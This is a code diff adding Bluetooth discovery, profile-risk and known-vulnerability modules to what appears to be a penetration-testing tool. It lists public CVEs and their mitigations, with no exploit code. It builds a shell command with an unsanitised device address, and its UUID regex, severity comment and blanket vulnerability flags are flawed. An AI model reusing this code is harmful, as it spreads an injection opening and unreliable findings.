+          type: "ble", // Will be updated if we get more info
+          services: [],
+          serviceUuids: [],
+          uuids: [],
+          paired: false,
+          connected: false,
+          trusted: false,
+          blocked: false,
+          firstSeen: Date.now(),
+          lastSeen: Date.now(),
+        })
+      }
+    }
+
+    return devices
+  }
+
+  // ========== Combined Scanning ==========
+
+  /**
+   * Scan for all Bluetooth devices (classic and BLE).
+   */
+  export async function scanAll(
+    duration: number,
+    execCommand: (cmd: string) => Promise<{ stdout: string; stderr: string; exitCode: number }>
+  ): Promise<WirelessScanTypes.BluetoothDevice[]> {
+    const deviceMap = new Map<string, WirelessScanTypes.BluetoothDevice>()
+
+    // Scan classic
+    const classicDevices = await scanClassic(Math.floor(duration / 2), execCommand)
+    for (const device of classicDevices) {
+      deviceMap.set(device.address, device)
+    }
+
+    // Scan BLE
+    const bleDevices = await scanBLE(Math.floor(duration / 2), execCommand)
+    for (const device of bleDevices) {
+      if (deviceMap.has(device.address)) {
+        // Device supports both classic and BLE
+        deviceMap.get(device.address)!.type = "dual"
+      } else {
+        deviceMap.set(device.address, device)
+      }
+    }
+
+    const devices = Array.from(deviceMap.values())
+
+    // Emit events
+    for (const device of devices) {
+      Bus.publish(WirelessScanEvents.BluetoothFound, {
+        scanId: "",
+        address: device.address,
+        name: device.name,
+        type: device.type,
+        rssi: device.rssi,
+        manufacturer: device.manufacturer,
+      })
+    }
+
+    return devices
+  }
+
+  // ========== Device Class Parsing ==========
+
+  /**
+   * Parse Bluetooth device class.
+   */
+  function parseDeviceClass(classHex: string): WirelessScanTypes.BluetoothClass {
+    const classNum = parseInt(classHex, 16)
+
+    // Extract major and minor device class
+    const majorClass = (classNum >> 8) & 0x1f
+    const minorClass = (classNum >> 2) & 0x3f
+
+    const majorClasses: Record<number, string> = {
+      0: "Miscellaneous",
+      1: "Computer",
+      2: "Phone",
+      3: "LAN/Network Access Point",
+      4: "Audio/Video",
+      5: "Peripheral",
+      6: "Imaging",
+      7: "Wearable",
+      8: "Toy",
+      9: "Health",
+      31: "Uncategorized",
+    }
+
+    return {
+      major: majorClasses[majorClass] || "Unknown",
+      minor: `0x${minorClass.toString(16).padStart(2, "0")}`,
+      services: extractServices(classNum),
+    }
+  }
+
+  /**
+   * Extract service classes from device class.
+   */
+  function extractServices(classNum: number): string[] {
+    const services: string[] = []
+    const serviceFlags = (classNum >> 13) & 0x7ff
+
+    if (serviceFlags & 0x001) services.push("Limited Discoverable")
+    if (serviceFlags & 0x008) services.push("Positioning")
+    if (serviceFlags & 0x010) services.push("Networking")
+    if (serviceFlags & 0x020) services.push("Rendering")
+    if (serviceFlags & 0x040) services.push("Capturing")
+    if (serviceFlags & 0x080) services.push("Object Transfer")
+    if (serviceFlags & 0x100) services.push("Audio")
+    if (serviceFlags & 0x200) services.push("Telephony")
+    if (serviceFlags & 0x400) services.push("Information")
+
+    return services
+  }
+
+  // ========== Device Info Enrichment ==========
+
+  /**
+   * Get detailed device info using bluetoothctl.
+   */
+  export async function getDeviceInfo(
+    address: string,
+    execCommand: (cmd: string) => Promise<{ stdout: string; stderr: string; exitCode: number }>
+  ): Promise<Partial<WirelessScanTypes.BluetoothDevice>> {
+    const result = await execCommand(
+      `bluetoothctl info ${address} 2>/dev/null || true`
+    )
+
+    if (!result.stdout) {
+      return {}
+    }
+
+    const info: Partial<WirelessScanTypes.BluetoothDevice> = {}
+    const lines = result.stdout.split("\n")
+
+    for (const line of lines) {
+      const trimmed = line.trim()
+
+      if (trimmed.startsWith("Name:")) {
+        info.name = trimmed.slice(5).trim()
+      } else if (trimmed.startsWith("Alias:")) {
+        info.alias = trimmed.slice(6).trim()
+      } else if (trimmed.startsWith("Paired:")) {
+        info.paired = trimmed.includes("yes")
+      } else if (trimmed.startsWith("Trusted:")) {
+        info.trusted = trimmed.includes("yes")
+      } else if (trimmed.startsWith("Blocked:")) {
+        info.blocked = trimmed.includes("yes")
+      } else if (trimmed.startsWith("Connected:")) {
+        info.connected = trimmed.includes("yes")
+      } else if (trimmed.startsWith("LegacyPairing:")) {
+        info.legacyPairing = trimmed.includes("yes")
+      } else if (trimmed.startsWith("UUID:")) {
+        if (!info.uuids) info.uuids = []
+        const uuidMatch = trimmed.match(/UUID:\s+([^\s]+)\s+$([^)]+)$/)
+        if (uuidMatch) {
+          info.uuids.push(uuidMatch[2]) // Push the UUID
+        }
+      } else if (trimmed.startsWith("RSSI:")) {
+        const rssiMatch = trimmed.match(/-?\d+/)
+        if (rssiMatch) {
+          info.rssi = parseInt(rssiMatch[0], 10)
+        }
+      } else if (trimmed.startsWith("TxPower:")) {
+        const txMatch = trimmed.match(/-?\d+/)
+        if (txMatch) {
+          info.txPower = parseInt(txMatch[0], 10)
+        }
+      }
+    }
+
+    return info
+  }
+
+  // ========== OUI Lookup ==========
+
+  const BT_OUI_DATABASE: Record<string, string> = {
+    "00:1A:7D": "Apple",
+    "00:1E:52": "Apple",
+    "00:21:E9": "Apple",
+    "00:23:12": "Apple",
+    "00:25:00": "Apple",
+    "00:26:08": "Apple",
+    "00:C6:10": "Apple",
+    "04:0C:CE": "Apple",
+    "04:15:52": "Apple",
+    "04:1E:64": "Apple",
+    "04:26:65": "Apple",
+    "04:4B:ED": "Apple",
+    "04:52:F3": "Apple",
+    "04:54:53": "Apple",
+    "04:D3:CF": "Apple",
+    "04:DB:56": "Apple",
+    "04:E5:36": "Apple",
+    "04:F7:E4": "Apple",
+    "08:00:07": "Apple",
+    "64:A2:F9": "OnePlus",
+    "94:65:2D": "OnePlus",
+    "C0:EE:FB": "OnePlus",
+    "30:07:4D": "Samsung",
+    "34:23:BA": "Samsung",
+    "38:01:97": "Samsung",
+    "40:0E:85": "Samsung",
+    "50:01:BB": "Samsung",
+    "50:32:75": "Samsung",
+    "50:77:05": "Samsung",
+    "50:85:69": "Samsung",
+    "54:92:BE": "Samsung",
+    "84:11:9E": "Samsung",
+    "84:25:DB": "Samsung",
+    "84:38:35": "Samsung",
+    "88:32:9B": "Samsung",
+    "00:1E:AE": "Google",
+    "54:60:09": "Google",
+    "94:EB:2C": "Google",
+    "98:D2:93": "Google",
+    "F8:0F:F9": "Google",
+    "A4:77:33": "Google",
+    "F4:F5:D8": "Google",
+    "3C:5A:B4": "Google",
+  }
+
+  /**
+   * Lookup manufacturer from MAC address OUI.
+   */
+  export function lookupManufacturer(mac: string): string | undefined {
+    const prefix = mac.toUpperCase().slice(0, 8)
+    return BT_OUI_DATABASE[prefix]
+  }
+
+  /**
+   * Enrich devices with manufacturer info.
+   */
+  export function enrichDevices(
+    devices: WirelessScanTypes.BluetoothDevice[]
+  ): WirelessScanTypes.BluetoothDevice[] {
+    return devices.map((device) => ({
+      ...device,
+      manufacturer: device.manufacturer || lookupManufacturer(device.address),
+    }))
+  }
+}
diff --git a/packages/opencode/src/pentest/wirelessscan/bluetooth/index.ts b/packages/opencode/src/pentest/wirelessscan/bluetooth/index.ts
new file mode 100644
index 00000000000..04ea7de43cc
--- /dev/null
+++ b/packages/opencode/src/pentest/wirelessscan/bluetooth/index.ts
@@ -0,0 +1,13 @@
+/**
+ * @fileoverview Bluetooth Module
+ *
+ * Exports Bluetooth scanning and security analysis functions.
+ *
+ * @module pentest/wirelessscan/bluetooth
+ */
+
+export { BluetoothDiscovery } from "./discovery"
+export { BluetoothBLE } from "./ble"
+export { BluetoothClassic } from "./classic"
+export { BluetoothProfiles } from "./profiles"
+export { BluetoothVulnerabilities } from "./vulnerabilities"
diff --git a/packages/opencode/src/pentest/wirelessscan/bluetooth/profiles.ts b/packages/opencode/src/pentest/wirelessscan/bluetooth/profiles.ts
new file mode 100644
index 00000000000..08f38e21a0a
--- /dev/null
+++ b/packages/opencode/src/pentest/wirelessscan/bluetooth/profiles.ts
@@ -0,0 +1,439 @@
+/**
+ * @fileoverview Bluetooth Profile Enumeration
+ *
+ * Standard Bluetooth profile information and enumeration.
+ *
+ * @module pentest/wirelessscan/bluetooth/profiles
+ */
+
+/**
+ * Bluetooth profiles namespace.
+ */
+export namespace BluetoothProfiles {
+  // ========== Standard Profiles ==========
+
+  /**
+   * Bluetooth profile definition.
+   */
+  export interface ProfileDefinition {
+    name: string
+    abbreviation: string
+    uuid16: string
+    description: string
+    securityLevel: "low" | "medium" | "high"
+    potentialRisks: string[]
+  }
+
+  /**
+   * Standard Bluetooth profiles.
+   */
+  export const PROFILES: Record<string, ProfileDefinition> = {
+    "0x1101": {
+      name: "Serial Port Profile",
+      abbreviation: "SPP",
+      uuid16: "0x1101",
+      description: "Emulates RS-232 serial cable connection",
+      securityLevel: "medium",
+      potentialRisks: [
+        "Arbitrary data transmission",
+        "Command injection if connected to vulnerable device",
+        "Data interception if not encrypted",
+      ],
+    },
+    "0x1102": {
+      name: "LAN Access Profile",
+      abbreviation: "LAP",
+      uuid16: "0x1102",
+      description: "Provides LAN access via Bluetooth",
+      securityLevel: "high",
+      potentialRisks: [
+        "Network access bypass",
+        "Man-in-the-middle attacks",
+        "Unauthorized network access",
+      ],
+    },
+    "0x1103": {
+      name: "Dialup Networking Profile",
+      abbreviation: "DUN",
+      uuid16: "0x1103",
+      description: "Provides modem access for dial-up networking",
+      securityLevel: "medium",
+      potentialRisks: ["Unauthorized modem usage", "Call interception"],
+    },
+    "0x1104": {
+      name: "IrMC Sync",
+      abbreviation: "SYNC",
+      uuid16: "0x1104",
+      description: "Synchronization of calendar/contacts",
+      securityLevel: "medium",
+      potentialRisks: ["Data leakage", "Unauthorized data sync"],
+    },
+    "0x1105": {
+      name: "OBEX Object Push",
+      abbreviation: "OPP",
+      uuid16: "0x1105",
+      description: "Push objects (files) to device",
+      securityLevel: "medium",
+      potentialRisks: ["Malware delivery", "Spam/unwanted files"],
+    },
+    "0x1106": {
+      name: "OBEX File Transfer",
+      abbreviation: "FTP",
+      uuid16: "0x1106",
+      description: "Browse and transfer files",
+      securityLevel: "high",
+      potentialRisks: ["Data exfiltration", "Malware upload", "File system access"],
+    },
+    "0x1107": {
+      name: "IrMC Sync Command",
+      abbreviation: "SYNC-CMD",
+      uuid16: "0x1107",
+      description: "Sync command protocol",
+      securityLevel: "medium",
+      potentialRisks: ["Unauthorized sync commands"],
+    },
+    "0x1108": {
+      name: "Headset Profile",
+      abbreviation: "HSP",
+      uuid16: "0x1108",
+      description: "Wireless headset connection",
+      securityLevel: "low",
+      potentialRisks: ["Audio eavesdropping", "Call hijacking"],
+    },
+    "0x110B": {
+      name: "Audio Sink",
+      abbreviation: "A2DP-SNK",
+      uuid16: "0x110B",
+      description: "Receive high-quality audio",
+      securityLevel: "low",
+      potentialRisks: ["Audio interception"],
+    },
+    "0x110C": {
+      name: "Audio Source",
+      abbreviation: "A2DP-SRC",
+      uuid16: "0x110C",
+      description: "Stream high-quality audio",
+      securityLevel: "low",
+      potentialRisks: ["Audio injection"],
+    },
+    "0x110E": {
+      name: "A/V Remote Control Target",
+      abbreviation: "AVRCP-TG",
+      uuid16: "0x110E",
+      description: "A/V remote control target device",
+      securityLevel: "low",
+      potentialRisks: ["Unauthorized media control"],
+    },
+    "0x110F": {
+      name: "A/V Remote Control",
+      abbreviation: "AVRCP",
+      uuid16: "0x110F",
+      description: "Remote control of A/V equipment",
+      securityLevel: "low",
+      potentialRisks: ["Device control hijacking"],
+    },
+    "0x1111": {
+      name: "Fax Profile",
+      abbreviation: "FAX",
+      uuid16: "0x1111",
+      description: "Fax transmission",
+      securityLevel: "medium",
+      potentialRisks: ["Unauthorized fax transmission", "Data leakage"],
+    },
+    "0x1112": {
+      name: "Headset Audio Gateway",
+      abbreviation: "HSP-AG",
+      uuid16: "0x1112",
+      description: "Audio gateway for headset",
+      securityLevel: "low",
+      potentialRisks: ["Audio eavesdropping"],
+    },
+    "0x1115": {
+      name: "Personal Area Networking User",
+      abbreviation: "PANU",
+      uuid16: "0x1115",
+      description: "PAN user role",
+      securityLevel: "high",
+      potentialRisks: ["Network access", "Traffic interception"],
+    },
+    "0x1116": {
+      name: "Network Access Point",
+      abbreviation: "NAP",
+      uuid16: "0x1116",
+      description: "Network access point role",
+      securityLevel: "high",
+      potentialRisks: ["Unauthorized network access", "Man-in-the-middle"],
+    },
+    "0x1117": {
+      name: "Group Ad-hoc Network",
+      abbreviation: "GN",
+      uuid16: "0x1117",
+      description: "Group ad-hoc networking",
+      securityLevel: "high",
+      potentialRisks: ["Unauthorized network participation"],
+    },
+    "0x111E": {
+      name: "Handsfree Profile",
+      abbreviation: "HFP",
+      uuid16: "0x111E",
+      description: "Hands-free calling",
+      securityLevel: "medium",
+      potentialRisks: ["Call eavesdropping", "Call manipulation"],
+    },
+    "0x111F": {
+      name: "Handsfree Audio Gateway",
+      abbreviation: "HFP-AG",
+      uuid16: "0x111F",
+      description: "Audio gateway for hands-free",
+      securityLevel: "medium",
+      potentialRisks: ["Call interception", "Contact access"],
+    },
+    "0x1124": {
+      name: "Human Interface Device",
+      abbreviation: "HID",
+      uuid16: "0x1124",
+      description: "HID device (keyboard, mouse, etc.)",
+      securityLevel: "high",
+      potentialRisks: ["Keystroke injection", "Mouse hijacking", "BadUSB-style attacks"],
+    },
+    "0x112D": {
+      name: "SIM Access",
+      abbreviation: "SAP",
+      uuid16: "0x112D",
+      description: "Access SIM card from external device",
+      securityLevel: "high",
+      potentialRisks: ["SIM cloning", "Call/SMS interception", "Identity theft"],
+    },
+    "0x112E": {
+      name: "Phonebook Access Client",
+      abbreviation: "PBAP-PCE",
+      uuid16: "0x112E",
+      description: "Access phonebook from client",
+      securityLevel: "medium",
+      potentialRisks: ["Contact data leakage"],
+    },
+    "0x112F": {
+      name: "Phonebook Access Server",
+      abbreviation: "PBAP-PSE",
+      uuid16: "0x112F",
+      description: "Provide phonebook access",
+      securityLevel: "medium",
+      potentialRisks: ["Contact data exposure"],
+    },
+    "0x1132": {
+      name: "Message Access Server",
+      abbreviation: "MAP-MSE",
+      uuid16: "0x1132",
+      description: "Message access server",
+      securityLevel: "high",
+      potentialRisks: ["SMS/MMS leakage", "Message manipulation"],
+    },
+  }
+
+  // ========== Profile Lookup ==========
+
+  /**
+   * Get profile by UUID.
+   */
+  export function getProfile(uuid: string): ProfileDefinition | undefined {
+    // Normalize UUID
+    const normalized = uuid.toLowerCase().startsWith("0x")
+      ? uuid.toLowerCase()
+      : `0x${uuid.toLowerCase()}`
+
+    return PROFILES[normalized]
+  }
+
+  /**
+   * Get profile by abbreviation.
+   */
+  export function getProfileByAbbreviation(abbr: string): ProfileDefinition | undefined {
+    const upperAbbr = abbr.toUpperCase()
+    return Object.values(PROFILES).find(
+      (p) => p.abbreviation.toUpperCase() === upperAbbr
+    )
+  }
+
+  /**
+   * Get all high-risk profiles.
+   */
+  export function getHighRiskProfiles(): ProfileDefinition[] {
+    return Object.values(PROFILES).filter((p) => p.securityLevel === "high")
+  }
+
+  /**
+   * Get profile risk assessment.
+   */
+  export function assessProfileRisk(uuid: string): {
+    profile?: ProfileDefinition
+    riskLevel: "unknown" | "low" | "medium" | "high"
+    risks: string[]
+  } {
+    const profile = getProfile(uuid)
+
+    if (!profile) {
+      return {
+        riskLevel: "unknown",
+        risks: ["Unknown profile - cannot assess risk"],
+      }
+    }
+
+    return {
+      profile,
+      riskLevel: profile.securityLevel,
+      risks: profile.potentialRisks,
+    }
+  }
+
+  // ========== Profile Categories ==========
+
+  /**
+   * Profile category.
+   */
+  export type ProfileCategory =
+    | "audio"
+    | "network"
+    | "file_transfer"
+    | "input"
+    | "communication"
+    | "sync"
+    | "other"
+
+  /**
+   * Categorize a profile.
+   */
+  export function categorizeProfile(uuid: string): ProfileCategory {
+    const audioProfiles = ["0x1108", "0x110B", "0x110C", "0x110E", "0x110F", "0x1112"]
+    const networkProfiles = ["0x1102", "0x1115", "0x1116", "0x1117"]
+    const fileProfiles = ["0x1105", "0x1106"]
+    const inputProfiles = ["0x1124"]
+    const commProfiles = ["0x1103", "0x111E", "0x111F", "0x112D", "0x112E", "0x112F", "0x1132"]
+    const syncProfiles = ["0x1104", "0x1107"]
+
+    const normalized = uuid.toLowerCase().startsWith("0x") ? uuid : `0x${uuid}`
+
+    if (audioProfiles.includes(normalized)) return "audio"
+    if (networkProfiles.includes(normalized)) return "network"
+    if (fileProfiles.includes(normalized)) return "file_transfer"
+    if (inputProfiles.includes(normalized)) return "input"
+    if (commProfiles.includes(normalized)) return "communication"
+    if (syncProfiles.includes(normalized)) return "sync"
+    return "other"
+  }
+
+  /**
+   * Get profiles by category.
+   */
+  export function getProfilesByCategory(
+    category: ProfileCategory
+  ): ProfileDefinition[] {
+    return Object.entries(PROFILES)
+      .filter(([uuid]) => categorizeProfile(uuid) === category)
+      .map(([, profile]) => profile)
+  }
+
+  // ========== Profile Statistics ==========
+
+  /**
+   * Get profile statistics from a list of UUIDs.
+   */
+  export function getProfileStats(uuids: string[]): {
+    total: number
+    known: number
+    unknown: number
+    byRiskLevel: Record<string, number>
+    byCategory: Record<string, number>
+  } {
+    const byRiskLevel: Record<string, number> = {
+      low: 0,
+      medium: 0,
+      high: 0,
+      unknown: 0,
+    }
+
+    const byCategory: Record<string, number> = {}
+    let known = 0
+
+    for (const uuid of uuids) {
+      const profile = getProfile(uuid)
+
+      if (profile) {
+        known++
+        byRiskLevel[profile.securityLevel]++
+      } else {
+        byRiskLevel.unknown++
+      }
+
+      const category = categorizeProfile(uuid)
+      byCategory[category] = (byCategory[category] || 0) + 1
+    }
+
+    return {
+      total: uuids.length,
+      known,
+      unknown: uuids.length - known,
+      byRiskLevel,
+      byCategory,
+    }
+  }
+
+  // ========== Format Functions ==========
+
+  /**
+   * Format profile list for display.
+   */
+  export function formatProfileList(uuids: string[]): string {
+    const lines: string[] = []
+
+    for (const uuid of uuids) {
+      const profile = getProfile(uuid)
+      if (profile) {
+        lines.push(`${profile.abbreviation} (${profile.name}) - Risk: ${profile.securityLevel}`)
+      } else {
+        lines.push(`${uuid} (Unknown Profile)`)
+      }
+    }
+
+    return lines.join("\n")
+  }
+
+  /**
+   * Format profile risk report.
+   */
+  export function formatRiskReport(uuids: string[]): string {
+    const lines: string[] = []
+    const highRisk: ProfileDefinition[] = []
+    const mediumRisk: ProfileDefinition[] = []
+
+    for (const uuid of uuids) {
+      const profile = getProfile(uuid)
+      if (profile) {
+        if (profile.securityLevel === "high") {
+          highRisk.push(profile)
+        } else if (profile.securityLevel === "medium") {
+          mediumRisk.push(profile)
+        }
+      }
+    }
+
+    if (highRisk.length > 0) {
+      lines.push("HIGH RISK PROFILES:")
+      for (const profile of highRisk) {
+        lines.push(`  ${profile.abbreviation}: ${profile.name}`)
+        for (const risk of profile.potentialRisks) {
+          lines.push(`    - ${risk}`)
+        }
+      }
+      lines.push("")
+    }
+
+    if (mediumRisk.length > 0) {
+      lines.push("MEDIUM RISK PROFILES:")
+      for (const profile of mediumRisk) {
+        lines.push(`  ${profile.abbreviation}: ${profile.name}`)
+      }
+    }
+
+    return lines.join("\n")
+  }
+}
diff --git a/packages/opencode/src/pentest/wirelessscan/bluetooth/vulnerabilities.ts b/packages/opencode/src/pentest/wirelessscan/bluetooth/vulnerabilities.ts
new file mode 100644
index 00000000000..2a88ee5693b
--- /dev/null
+++ b/packages/opencode/src/pentest/wirelessscan/bluetooth/vulnerabilities.ts
@@ -0,0 +1,429 @@
+/**
+ * @fileoverview Bluetooth Vulnerability Checks
+ *
+ * Known Bluetooth vulnerability detection and assessment.
+ *
+ * @module pentest/wirelessscan/bluetooth/vulnerabilities
+ */
+
+import { WirelessScanTypes } from "../types"
+import { WirelessScanStorage } from "../storage"
+import { Bus } from "../../../bus"
+import { WirelessScanEvents } from "../events"
+
+/**
+ * Bluetooth vulnerabilities namespace.
+ */
+export namespace BluetoothVulnerabilities {
+  // ========== Known Vulnerabilities ==========
+
+  /**
+   * Vulnerability definition.
+   */
+  export interface VulnerabilityDefinition {
+    id: string
+    name: string
+    cves: string[]
+    affectedVersions: string
+    type: "classic" | "ble" | "both"
+    severity: WirelessScanTypes.Severity
+    description: string
+    impact: string
+    mitigation: string
+    references: string[]
+  }
+
+  /**
+   * Known Bluetooth vulnerabilities database.
+   */
+  export const VULNERABILITIES: VulnerabilityDefinition[] = [
+    {
+      id: "blueborne",
+      name: "BlueBorne",
+      cves: [
+        "CVE-2017-0781",
+        "CVE-2017-0782",
+        "CVE-2017-0783",
+        "CVE-2017-0785",
+        "CVE-2017-8628",
+      ],
+      affectedVersions: "Android < September 2017, iOS < 10.3.3, Windows < October 2017, Linux < 4.14",
+      type: "both",
+      severity: "critical",
+      description:
+        "Collection of vulnerabilities allowing remote code execution and man-in-the-middle attacks without pairing.",
+      impact:
+        "Complete device compromise, data theft, malware installation, network propagation.",
+      mitigation:
+        "Update all devices to latest firmware/OS. Disable Bluetooth when not in use.",
+      references: [
+        "https://www.armis.com/blueborne/",
+        "https://nvd.nist.gov/vuln/detail/CVE-2017-0785",
+      ],
+    },
+    {
+      id: "knob",
+      name: "KNOB Attack",
+      cves: ["CVE-2019-9506"],
+      affectedVersions: "Bluetooth BR/EDR Core Specification versions 1.0 to 5.1",
+      type: "classic",
+      severity: "high",
+      description:
+        "Key Negotiation of Bluetooth attack allows forcing weak encryption keys.",
+      impact:
+        "Encryption bypass, traffic interception, data manipulation.",
+      mitigation:
+        "Update firmware. Enforce minimum encryption key length of 16 bytes.",
+      references: [
+        "https://knobattack.com/",
+        "https://nvd.nist.gov/vuln/detail/CVE-2019-9506",
+      ],
+    },
+    {
+      id: "bias",
+      name: "BIAS Attack",
+      cves: ["CVE-2020-10135"],
+      affectedVersions: "Bluetooth BR/EDR devices compliant with Core Specification 5.2 and earlier",
+      type: "classic",
+      severity: "high",
+      description:
+        "Bluetooth Impersonation AttackS allows impersonating previously paired devices.",
+      impact:
+        "Device impersonation, authentication bypass, man-in-the-middle.",
+      mitigation:
+        "Update firmware. Use Secure Connections mode with mutual authentication.",
+      references: [
+        "https://francozappa.github.io/about-bias/",
+        "https://nvd.nist.gov/vuln/detail/CVE-2020-10135",
+      ],
+    },
+    {
+      id: "blesa",
+      name: "BLESA",
+      cves: ["CVE-2020-9770"],
+      affectedVersions: "BLE devices implementing reconnection",
+      type: "ble",
+      severity: "medium",
+      description:
+        "Bluetooth Low Energy Spoofing Attacks on reconnection process.",
+      impact: "Device spoofing during reconnection, unauthorized access.",
+      mitigation:
+        "Update BLE stack. Implement proper reconnection authentication.",
+      references: [
+        "https://www.usenix.org/conference/woot20/presentation/wu",
+        "https://nvd.nist.gov/vuln/detail/CVE-2020-9770",
+      ],
+    },
+    {
+      id: "sweyntooth",
+      name: "SweynTooth",
+      cves: [
+        "CVE-2019-16336",
+        "CVE-2019-17060",
+        "CVE-2019-17061",
+        "CVE-2019-17517",
+        "CVE-2019-17518",
+        "CVE-2019-17519",
+        "CVE-2019-17520",
+        "CVE-2019-19192",
+        "CVE-2019-19193",
+        "CVE-2019-19194",
+        "CVE-2019-19195",
+        "CVE-2019-19196",
+      ],
+      affectedVersions: "Multiple BLE SDK implementations",
+      type: "ble",
+      severity: "high",
+      description:
+        "Collection of vulnerabilities in BLE implementations from various vendors.",
+      impact: "Denial of service, deadlock, security bypass, code execution.",
+      mitigation: "Update device firmware. Check vendor advisories for patches.",
+      references: [
+        "https://asset-group.github.io/disclosures/sweyntooth/",
+        "https://www.kb.cert.org/vuls/id/647177/",
+      ],
+    },
+    {
+      id: "braktooth",
+      name: "BrakTooth",
+      cves: ["CVE-2021-28139", "CVE-2021-28136", "CVE-2021-28135"],
+      affectedVersions: "Multiple Bluetooth Classic implementations",
+      type: "classic",
+      severity: "high",
+      description:
+        "Family of vulnerabilities in commercial BT Classic stacks.",
+      impact: "Denial of service, arbitrary code execution.",
+      mitigation: "Update firmware. Apply vendor patches when available.",
+      references: [
+        "https://asset-group.github.io/disclosures/braktooth/",
+        "https://nvd.nist.gov/vuln/detail/CVE-2021-28139",
+      ],
+    },
+    {
+      id: "blur",
+      name: "BLUR Attack",
+      cves: ["CVE-2020-15802"],
+      affectedVersions: "Bluetooth 4.0 through 5.0",
+      type: "both",
+      severity: "medium",
+      description:
+        "BLURtooth attack on Cross-Transport Key Derivation (CTKD).",
+      impact: "Key overwriting, authentication bypass, MITM.",
+      mitigation:
+        "Restrict CTKD to authenticated peers. Update to patched firmware.",
+      references: [
+        "https://kb.cert.org/vuls/id/589825",
+        "https://nvd.nist.gov/vuln/detail/CVE-2020-15802",
+      ],
+    },
+    {
+      id: "just_works",
+      name: "Just Works Pairing Vulnerability",
+      cves: [],
+      affectedVersions: "All Bluetooth versions using Just Works pairing",
+      type: "both",
+      severity: "medium",
+      description:
+        "Just Works pairing provides no protection against MITM attacks.",
+      impact: "Man-in-the-middle attacks during pairing.",
+      mitigation:
+        "Use Numeric Comparison or Passkey Entry pairing methods instead.",
+      references: [
+        "https://www.bluetooth.com/specifications/specs/core-specification/",
+      ],
+    },
+  ]
+
+  // ========== Vulnerability Detection ==========
+
+  /**
+   * Check for known vulnerabilities based on device characteristics.
+   */
+  export function checkVulnerabilities(
+    device: WirelessScanTypes.BluetoothDevice,
+    scanId: string
+  ): WirelessScanTypes.WirelessFinding[] {
+    const findings: WirelessScanTypes.WirelessFinding[] = []
+
+    // Check device type compatibility
+    const deviceType = device.type
+
+    for (const vuln of VULNERABILITIES) {
+      // Skip if vulnerability doesn't affect this device type
+      if (vuln.type !== "both" && vuln.type !== deviceType) {
+        continue
+      }
+
+      // Check specific vulnerability conditions
+      if (shouldCheckVulnerability(device, vuln)) {
+        const finding = createVulnerabilityFinding(device, vuln, scanId)
+        findings.push(finding)
+
+        // Emit event
+        Bus.publish(WirelessScanEvents.BluetoothVulnerable, {
+          scanId,
+          address: device.address,
+          name: device.name,
+          vulnerability: vuln.name,
+          cve: vuln.cves[0],
+        })
+      }
+    }
+
+    // Check for Just Works pairing
+    if (device.legacyPairing === false && device.paired === false) {
+      const justWorks = VULNERABILITIES.find((v) => v.id === "just_works")
+      if (justWorks) {
+        findings.push(createVulnerabilityFinding(device, justWorks, scanId))
+      }
+    }
+
+    return findings
+  }
+
+  /**
+   * Determine if a vulnerability should be checked for a device.
+   */
+  function shouldCheckVulnerability(
+    device: WirelessScanTypes.BluetoothDevice,
+    vuln: VulnerabilityDefinition
+  ): boolean {
+    // For now, we flag potential vulnerabilities as informational
+    // since we can't definitively determine firmware versions
+
+    switch (vuln.id) {
+      case "blueborne":
+        // BlueBorne affects unpatched devices from 2017 and earlier
+        // Flag all devices as potentially vulnerable
+        return device.type === "classic" || device.type === "dual"
+
+      case "knob":
+      case "bias":
+      case "braktooth":
+        // Affects classic Bluetooth
+        return device.type === "classic" || device.type === "dual"
+
+      case "blesa":
+      case "sweyntooth":
+        // Affects BLE
+        return device.type === "ble" || device.type === "dual"
+
+      case "blur":
+        // Affects devices supporting both classic and BLE
+        return device.type === "dual"
+
+      default:
+        return false
+    }
+  }
+
+  /**
+   * Create a finding for a vulnerability.
+   */
+  function createVulnerabilityFinding(
+    device: WirelessScanTypes.BluetoothDevice,
+    vuln: VulnerabilityDefinition,
+    scanId: string
+  ): WirelessScanTypes.WirelessFinding {
+    return {
+      id: WirelessScanStorage.createFindingId(),
+      scanId,
+      wirelessType: "bluetooth",
+      category: "vulnerability",
+      severity: vuln.severity === "critical" ? "high" : vuln.severity, // Downgrade to info since not confirmed
+      title: `Potential ${vuln.name} Vulnerability`,
+      description: `Device ${device.name || device.address} may be vulnerable to ${vuln.name}. ${vuln.description}`,
+      target: {
+        type: "device",
+        identifier: device.address,
+        name: device.name,
+      },
+      vulnerability: vuln.name,
+      cve: vuln.cves[0],
+      recommendation: vuln.mitigation,
+      references: vuln.references,
+      evidence: `Device type: ${device.type}, Affected versions: ${vuln.affectedVersions}`,
+      falsePositive: false,
+      verified: false,
+      detectedAt: Date.now(),
+    }
+  }
+
+  // ========== Vulnerability Lookup ==========
+
+  /**
+   * Get vulnerability by ID.
+   */
+  export function getVulnerability(id: string): VulnerabilityDefinition | undefined {
+    return VULNERABILITIES.find((v) => v.id === id)
+  }
+
+  /**
+   * Get vulnerabilities by CVE.
+   */
+  export function getVulnerabilityByCVE(cve: string): VulnerabilityDefinition | undefined {
+    return VULNERABILITIES.find((v) => v.cves.includes(cve))
+  }
+
+  /**
+   * Get vulnerabilities affecting a specific type.
+   */
+  export function getVulnerabilitiesForType(
+    type: "classic" | "ble"
+  ): VulnerabilityDefinition[] {
+    return VULNERABILITIES.filter((v) => v.type === type || v.type === "both")
+  }
+
+  /**
+   * Get critical vulnerabilities.
+   */
+  export function getCriticalVulnerabilities(): VulnerabilityDefinition[] {
+    return VULNERABILITIES.filter((v) => v.severity === "critical")
+  }
+
+  // ========== Reporting ==========
+
+  /**
+   * Generate vulnerability report for a device.
+   */
+  export function generateReport(
+    device: WirelessScanTypes.BluetoothDevice,
+    findings: WirelessScanTypes.WirelessFinding[]
+  ): string {
+    const lines: string[] = []
+
+    lines.push(`Bluetooth Security Report: ${device.name || device.address}`)
+    lines.push("=".repeat(60))
+    lines.push("")
+
+    lines.push(`Device Type: ${device.type}`)
+    lines.push(`Address: ${device.address}`)
+    if (device.manufacturer) lines.push(`Manufacturer: ${device.manufacturer}`)
+    lines.push("")
+
+    if (findings.length === 0) {
+      lines.push("No known vulnerabilities detected.")
+    } else {
+      lines.push(`Potential Vulnerabilities: ${findings.length}`)
+      lines.push("")
+
+      const bySeverity: Record<string, WirelessScanTypes.WirelessFinding[]> = {}
+      for (const finding of findings) {
+        const sev = finding.severity
+        if (!bySeverity[sev]) bySeverity[sev] = []
+        bySeverity[sev].push(finding)
+      }
+
+      for (const severity of ["critical", "high", "medium", "low", "info"]) {
+        const sevFindings = bySeverity[severity]
+        if (sevFindings?.length) {
+          lines.push(`[${severity.toUpperCase()}]`)
+          for (const finding of sevFindings) {
